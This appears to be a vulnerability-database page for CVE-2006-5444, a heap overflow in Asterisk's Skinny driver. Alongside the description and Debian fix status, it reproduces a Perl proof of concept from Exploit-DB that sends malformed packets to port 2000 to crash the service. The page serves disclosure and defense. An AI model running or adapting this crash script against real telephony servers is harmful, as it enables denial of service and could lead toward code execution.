CVE-2006-5444

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-2597 dos multiple verified perl · 1 KB

Noam Rathaus · 2006-10-19

Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)

perl exploit Source: Exploit-DB

#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept causes the chan_skippy to crash in different locations and due to
# memory corruption as well as double free calls, this is based on the finding of
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
#

use IO::Socket;
use strict;

my $target = "127.0.0.1";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");

unless ($remote) { die "cannot connect to skinny daemon on $target" }

my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
#[Switching to Thread -1494127696 (LWP 9909)]
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);

print $remote $packet;

# milw0rm.com [2006-10-19]

OS impact

Debian Fixed 2 releases

Version	Status	Fixed in
sid	Fixed	`1:1.2.13~dfsg-1`
bullseye	Fixed	`1:1.2.13~dfsg-1`

References

https://security-tracker.debian.org/tracker/CVE-2006-5444

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.